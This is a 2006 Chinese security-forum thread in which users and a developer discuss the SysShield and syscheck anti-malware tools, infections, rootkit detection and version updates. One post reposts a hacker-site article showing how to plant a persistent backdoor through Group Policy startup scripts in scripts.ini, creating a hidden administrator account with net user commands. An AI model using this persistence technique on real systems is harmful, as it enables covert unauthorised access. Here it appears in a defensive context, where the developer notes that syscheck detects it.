[sysshield]系统安全盾

zrfdcs · 发表于 2006-9-23 17:03:01

原帖由 wang6071 于 2006-9-23 03:37 PM 发表

节假日网盘太挤,直接上传安全盾1.34安装包给各兄弟,主程序改回upx压缩,杀软不会再误报了.

终于用上新版的安全盾了，谢谢。

happyday2 · 发表于 2006-9-23 18:50:04

原帖由 wang6071 于 2006-9-22 09:27 PM 发表
...
另外关于happyday2 的那个规则建议我同意xdg3669兄弟的意见,看着描述都昏~~~
规则还是不要有太大的变化为好,这样容易理解一些.
...

呵呵，其实规则也不难理解，只是描述得不好，尤其那两个名称有点拗口，所以把人搞昏了。

zyjffnn · 发表于 2006-9-23 19:33:05

下午用了1.20版的，好像与杀马及电驴有冲突，学习中

zrfdcs · 发表于 2006-9-23 19:35:20

在安全盾运行的情况下，中标了。安全盾的设置是WINNT和Program Files及其子目录禁止写入任何文件。文件监控清单中删除了非常长的许多文件。但Program Files\Common Files\Microsoft Shared\MSInfo下还是被写入了sysinfo.wmp这个文件（这个文件还是进老九的硬盘版XPE才删除掉）。而且Program Files\cnnic下的子目录中还有文件未删除干净。

[ 本帖最后由 zrfdcs 于 2006-9-23 09:12 PM 编辑 ]

uime · 发表于 2006-9-23 20:25:00

[转载]启动后门的一个思路

文章作者：OnlyVeR
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

组策略启动脚本;
利用过程:启动组策略(运行->gpedit.msc->计算机配置->Windows 设置->脚本(启动/关机) )
启动与关机相关设置;
选择启动->属性->添加会弹出选择脚本名
选择程序 C:\windows\system32\net.exe 参数 user admin /add 来执行 net user admin /add
再同样添加C:\Windows\system32\net.exe localgroup administrators admin /add
来执行 net localgroup administrators admin /add
{ .老鸟跑出来say:TMD这都是费话,net user早懂了砰的一声 (PS:我脑袋被拍个包来了) }

费话少说：在经过进一步了解的时候发现这里是由
C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\scripts.ini
(PS:默认是隐藏的.) 来控制 shutdown 和 Startup 的.

ini组成方式如下
------------------------------

[Startup]
0CmdLine=C:\WINDOWS\system32\net.exe
0Parameters=user admin /add
1CmdLine=C:\WINDOWS\system32\net.exe
1Parameters=localgroup administrators admin /add
[Shutdown]
0CmdLine=1.bat
0Parameters=

[startup] \\代表是启动
0CmdLine=C:\WINDOWS\system32\net.exe \\脚本名
0Parameters=user admin /add \\脚本参数
1CmdLine=C:\WINDOWS\system32\net.exe \\第二条脚本名
1Parameters=localgroup administrators admin /add \\第二条脚本参数
[Shutdown] \\关闭 (。。我再来一句,倒塌.还没说完又被砖给拍了下.)
0CmdLine=1.bat \\脚本名 1.bat 目录队应于 C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\Startup
0Parameters= \\参数
------------------------------

也就是说 scripts.ini 控制着整个启动. 就如同以前 win.ini 一样
C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\Startup\ 启动文件的目录,那样脚本名路径就可以不用加详细目录名了.
C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\shutdown\ 关闭文件目录, 同上.
思路就这样. copy 后门到非常隐藏的目录再加个启动脚本参数实现木马启动.

longwang · 发表于 2006-9-23 21:22:24

原帖由 250662772 于 2006-9-23 03:27 PM 发表
syscheck(1.0.0.37)为什么还是不能内核检测？麻烦作者检查一下，我用超级巡警试了一下，也能检测出来。我现在只能用作者原来发布的那个软件检测了。

to wangsea：

从上面的兄弟反应的情况看来ssdtrestore好像检测到了卡巴的驱动，为什么使用syscheck未检测到呢，请王兄检查一下。现在ssdtrestore也不提供下载了，我没法测试。最好能完善检测功能，毕竟检测的重要性超过清除。只要能检测到，总是有办法清除的，大不了用红叶的winpe，呵呵。

[ 本帖最后由 longwang 于 2006-9-23 09:30 PM 编辑 ]

wang6071 · 发表于 2006-9-23 21:37:40

原帖由 zrfdcs 于 2006-9-23 07:35 PM 发表
在安全盾运行的情况下，中标了。安全盾的设置是WINNT和Program Files及其子目录禁止写入任何文件。文件监控清单中删除了非常长的许多文件。但Program Files\Common Files\Microsoft Shared\MSInfo下还是被写入了s ...

用的是哪个版本?看情况似乎是安装某个捆绑软件发生的,请提供该软件或它的下载.
另外,虽然发生了上述情况,重启后用别的软件检测发现写了哪些可疑的启动或bho等.
还有哪些不正常的情况?那个在正常情况下删除不了的文件是重启后删除不了,还是当时删除不了?

wang6071 · 发表于 2006-9-23 21:41:51

原帖由 longwang 于 2006-9-23 09:22 PM 发表
to wangsea：
从上面的兄弟反应的情况看来ssdtrestore好像检测到了卡巴的驱动，为什么使用syscheck未检测到呢，请王兄检查一下。现在ssdtrestore也不提供下载了，我没法测试。最好能完善检测功能，毕竟检测 ...

那位兄弟用的是前些测试后未再提供的ssdt驱动版,与卡巴在同一平台所以可能是可以检测到卡巴的．现在的syscheck从兼容性上考虑未使用驱动（因为这样就要求使用ssdt检测功能时要暂停一下安全盾的监视），所以受卡巴的限制检不到卡巴．

楼下有过卡6的版本下载

---------
谢谢 uime 转贴的文章，近几个版本的syscheck都可以检测script.ini脚本．

[ 本帖最后由 wang6071 于 2006-9-24 10:40 AM 编辑 ]

zwww1967 · 发表于 2006-9-23 21:57:47

原帖由 wang6071 于 2006-9-23 03:37 PM 发表

节假日网盘太挤,直接上传安全盾1.34安装包给各兄弟,主程序改回upx压缩,杀软不会再误报了.
终于用上新版的安全盾了，谢谢。

longwang · 发表于 2006-9-23 23:30:35

经测试在我的xpsp2，卡巴6.0.0.307上两个都运行不正常，驱动型出错无法正常运行，无驱型被卡巴拦截，弹出提示，选跳过后，仍然不正常。

uime · 发表于 2006-9-24 07:03:02

可不可以把安全盾做成服务，探讨一下

zrfdcs · 发表于 2006-9-24 08:35:38

原帖由 wang6071 于 2006-9-23 09:37 PM 发表

用的是哪个版本?看情况似乎是安装某个捆绑软件发生的,请提供该软件或它的下载.
另外,虽然发生了上述情况,重启后用别的软件检测发现写了哪些可疑的启动或bho等.
还有哪些不正常的情况?那个在正常情况下删除不 ...

安全盾是最新版的。
不是安装软件，是访问网页，应该是蔫老虎在线的一个网页，当时我在搜索BT怎么设Upnp和NAT才找到这个网页的。
当时同时进来了好几个流氓软件，除了我前面提到的，还有Program Files\Ad4all和Program Files\Common Files\Update2，其文件被安全盾全删了，NT/system32下也进了好几个文件也被安全盾删了。那个Sysinfo.wmp用Syscheck重启后删除也不行（这个Sysinfo.wmp是挂接在Explorer下）。Cnnic子目录下的文件没有试重启删除，最后在硬盘版XPE中删掉，结果系统重启失败。通过安全模式恢复最后一次正确的设置后才正常。

另：搜索一下Sysinfo.wmp，是Trojan-PSW.Win32.QQPass.jr木马相关文件，但我机子上并没有装QQ之类的软件。

[ 本帖最后由 zrfdcs 于 2006-9-24 09:03 AM 编辑 ]

emca · 发表于 2006-9-24 09:13:44

根据本坛及其他论坛的一些反馈，添加了几个关键流氓特征。

对付流氓病毒目前最可靠的办法仍然是目录和文件免疫，并采用NTFS文件系统。由于安全盾在安装程序时，虽然也可由用户分为信任和不信任的程序，但对于信任级别的划分仍然没有一个具体的标准的，没有实际安装之前谁也弄不准网上的东西是否有害！因此，仍然存在有漏网之鱼的可能。因此目录免疫既不占用资源，又可有效对付捆绑安装。

因此这里把安全盾最新规则贴上来，也请Wangsea兄弟同步更新一下。

另外，为方便大家进行目录免疫，昨晚连夜做了一个目录免疫的新脚本RogouDead.rar，用WinRAR解压后即可看到脚本内容。现在采用的是黑名单文件列表的方式，几个典型的目录中的流氓病毒特征目录和文件都分别放在不同的文本文件中，因此你可以随时添加新的免疫特征（添加前搜索一下是否有这个字符串，即可有效避免重复）。维护这些特征列表已经极其方便了！其中的注册表就没有免疫，因为文件不能进来了，就算添加几个注册表键值也只不过增加一点无用的垃圾而已，清理也非常容易（没有病毒的保护。起码在中毒后再重启后清除一点问题都没有）。

另外，在测试播霸时，发现我主动植入的流氓病毒中，有两个驱动用 Syscheck 能够在服务中查看到，但无法中止、禁用和删除！它们是 Drivers\fsprot.sys和Drivers\moprot.sys。试用其他工具如由流氓老大制作的“360自殴工具”（即360安全卫士）等也不能清理。最后使用最新的 Windows 优化大师中的恶意程序清除工具，倒是一次性干掉了，也不需重启！这叫牛啊！希望 Wangsea 研究一下它是怎么实现的。

]“杀毒”厂商对“流氓软件”宣战 http://news.cctv.com/society/20060922/102588.shtml

[ 本帖最后由 emca 于 2006-9-24 09:27 AM 编辑 ]

wang6071 · 发表于 2006-9-24 09:46:33

原帖由 longwang 于 2006-9-23 11:30 PM 发表
经测试在我的xpsp2，卡巴6.0.0.307上两个都运行不正常，驱动型出错无法正常运行，无驱型被卡巴拦截，弹出提示，选跳过后，仍然不正常。

安装了卡6调试,驱动版通过了,可以检测.但觉得syscheck从兼容性上考虑还没必要集成这个驱动版的,各位兄弟下载单独用吧.

-----------------
另外，在测试播霸时，发现我主动植入的流氓病毒中，有两个驱动用 Syscheck 能够在服务中查看到，但无法中止、禁用和删除！它们是 Drivers\fsprot.sys和Drivers\moprot.sys。试用其他工具如由流氓老大制作的“360自殴工具”（即360安全卫士）等也不能清理。最后使用最新的 Windows 优化大师中的恶意程序清除工具，倒是一次性干掉了，也不需重启！这叫牛啊！希望 Wangsea 研究一下它是怎么实现的。

估计在删除中服了延时删除(syscheck的驱动删除没有加延时删除),下一版syscheck在删除服务时也加入延时删除应该容易干掉这样的驱动.楼上兄弟反映的Sysinfo.wmp用Syscheck重启后删除也不行,估计也是没用延时删除的原因,可以考虑在安全盾的下一版中对无法删除的文件加延时删除.

[ 本帖最后由 wang6071 于 2006-9-24 09:54 AM 编辑 ]

namejm · 发表于 2006-9-24 10:07:27

　　建议红叶对 del /F /S /Q 语句再添加一个参数 /a，变成del /A /F /S /Q，这样就比较强悍了。

wang6071 · 发表于 2006-9-24 10:41:41

安全盾1.35:
本次更新采用红叶兄最新整理出来的过滤设置,改进了文件删除的算法以使其更有效。

emca · 发表于 2006-9-24 10:42:46

发现一个有关SSDT恢复的讨论，其中有人提出：HOOK NtOpenSection..........上面方法就失效了

http://bbs.zndev.com/htm_data/16/0606/112837.html

emca · 发表于 2006-9-24 10:50:31

360safe驱动程序用的API
http://bbs.zndev.com/read.php?tid-116911.html

逆向分析360safe的驱动部分源码
http://bbs.zndev.com/read.php?tid-116936.html

高级WIN2K ROOTKIT检测技术
http://bbs.zndev.com/read.php?tid-116843.html

wang6071 · 发表于 2006-9-24 10:50:53

原帖由 emca 于 2006-9-24 10:42 AM 发表
发现一个有关SSDT恢复的讨论，其中有人提出：HOOK NtOpenSection..........上面方法就失效了

http://bbs.zndev.com/htm_data/16/0606/112837.html

偶的驱动版不是用的这个方法,可能还可以用得时间长一些．

longwang · 发表于 2006-9-24 11:53:50

新版的ssdt检测过卡6版，在我的xpsp2,卡巴6.0.0.307上工作正常，能检测到，但和Icesword相比11B以后的没显示，不知是不是故意的？另外norton好像也使用了rootkit技术，不知道有没有norton的朋友测试过。

[ 本帖最后由 longwang 于 2006-9-24 12:00 PM 编辑 ]

wang6071 · 发表于 2006-9-24 12:03:51

syscheck(1.0.0.38)
调整原来的删除服务为删除服务及文件,并同时采用多种方式删除服务注册键及文件。

--------------------------
新版的ssdt检测过卡6版，在我的xpsp2,卡巴6.0.0.307上工作正常，能检测到，但和Icesword相比11B以后的没显示，不知是不是故意的？

11b以后在安了卡6后有异常,is截图:

[ 本帖最后由 wang6071 于 2006-9-24 01:04 PM 编辑 ]

longwang · 发表于 2006-9-24 12:51:22

原帖由 wang6071 于 2006-9-24 12:03 PM 发表

11b以后在安了卡6后有异常...

的确是，icesword的检测结果也是那样的，看来“ssdt检测过卡6版”是故意把异常的隐藏了吧。

另外，不知wangsea兄有没有计划推出一个驱动版的syscheck？我想还是有很多人有此期待的。

wang6071 · 发表于 2006-9-24 13:03:51

原帖由 longwang 于 2006-9-24 12:51 PM 发表

的确是，icesword的检测结果也是那样的，看来“ssdt检测过卡6版”是故意把异常的隐藏了吧。

另外，不知wangsea兄有没有计划推出一个驱动版的syscheck？我想还是有很多人有此期待的。

从兼容性上考虑近期不想集成驱动版的syscheck,也还没有到非要用驱动的ssdt还原才搞得定流氓的地步．楼上的syscheck (1.0.0.38)有个小bug,已修复成syscheck(1.0.0.38b)版，可以在服务管理中将avp禁用了．(虽然删除不了它，能将其服务启动改为禁用,重启应可以删除了).

[ 本帖最后由 wang6071 于 2006-9-24 01:26 PM 编辑 ]

longwang · 发表于 2006-9-24 13:30:20

to wangsea：

删除卡巴不是我的目的，检测卡巴也不是我的目的，仅以卡巴做了一个测试。我希望得到比较全面的系统检测，毕竟使用syssheild的还是少数，不应该为那小小的不方便，而牺牲更大的使用范围。至少在卡巴的机子上ssdt模块是不能正常工作的。而且完全可以启动syscheck的时候，发送消息，暂停syssheild的保护。以上意见供王兄参考。

[ 本帖最后由 longwang 于 2006-9-24 01:42 PM 编辑 ]

longwang · 发表于 2006-9-24 14:27:25

syscheck(1.0.0.38)信任列表，好像路径和MD5值同时符合才认为是信任的，不知有没有这不必要？

ok-gao · 发表于 2006-9-24 14:45:10

能否写个用syscheck杀掉威金病毒的实战教程？这个病毒最近名气很大，估计用到的手段也得多。如果有图文并茂的实战教程，并将运用的思路也简述一下，这样菜鸟可以通过每一步的运用，熟悉各选项的功能。同时，也可以将实际考验呈现给用户，有利于syscheck的推广。

刚接触这个软件，想看个实践的例子中的运用，并从中学习。我想，这也可能是大多数新接触这个软件人的想法吧。

wang6071 · 发表于 2006-9-24 16:28:19

安全盾1.35b,修正一点小Bug,一般情况下可能不会发生,发现了就将它修正一下.

------------
不愿重复安装的可以直接用下面的SysShield.rar覆盖更新.

[ 本帖最后由 wang6071 于 2006-9-24 04:29 PM 编辑 ]

wang6071 · 发表于 2006-9-24 16:43:53

原帖由 longwang 于 2006-9-24 01:30 PM 发表
to wangsea：

删除卡巴不是我的目的，检测卡巴也不是我的目的，仅以卡巴做了一个测试。我希望得到比较全面的系统检测，毕竟使用syssheild的还是少数，不应该为那小小的不方便，而牺牲更大的使用范围。至少在卡 ...

我知道,所以我才装卡巴调试的,加驱动还是缓缓再说,兼容第一,且单独的驱动版已提供了,所以不着急.(给sysshieild发消息并不是好主意,sysshield讨论得越多,保护性越差.)

原帖由 longwang 于 2006-9-24 02:27 PM 发表
syscheck(1.0.0.38)信任列表，好像路径和MD5值同时符合才认为是信任的，不知有没有这不必要？

我个人认为连Md5验证都无此必要,自已定制的信任文件最好,也不易出假冒事件．最重要的是不通用就不好了，无法共享过滤文件就不能在多机检测时加快查找速度．这个信任列表本身是用来加快查找速度参考用的，但现在与原意有点相违了．
各位提提意见，觉得下一版是否该取消Md5验证，同意的占多数就取消．

原帖由 ok-gao 于 2006-9-24 02:45 PM 发表
能否写个用syscheck杀掉威金病毒的实战教程？这个病毒最近名气很大，估计用到的手段也得多。如果有图文并茂的实战教程，并将运用的思路也简述一下，这样菜鸟可以通过每一步的运用，熟悉各选项的功能。同时，也可以 ...

威金病毒是一个感染pe的病毒，杀软清除后exe的图标都会变成花花的Rar图标，syscheck可以清除威金的主程序及其生成文件，但无法清除其感染了的Pe头．所以用syscheck清除已感染了的电脑效果并不好．

[ 本帖最后由 wang6071 于 2006-9-24 04:51 PM 编辑 ]

emca · 发表于 2006-9-24 17:19:15

MD5 没有太大价值。那个可信列表仅仅只适合自己熟悉或相近的环境，让程序有点个性化，方便日常使用。我分别处理过多个不同环境的机器，发现很难让可信列表做到到处适用的。其实，有一个不显示微软服务的功能就已经足够了！

只是在使用中感觉有一个小小不便：在“进程管理”和“活动文件”中，不能右击查看对象的属性。而查看属性往往是非常有用的。希望考虑一下。

freesoft00 · 发表于 2006-9-24 17:21:52

继IceSword后又一反Rootkit利器 DarkSpy

贴子地址：

http://www.ccfox.net/viewthread.php?tid=2289&extra=page%3D1

软件管方网站

http://www.fyyre.net/~cardmagic/index_en.html

目前还是测试版，不太稳定

		自动登录	找回密码
密码			注册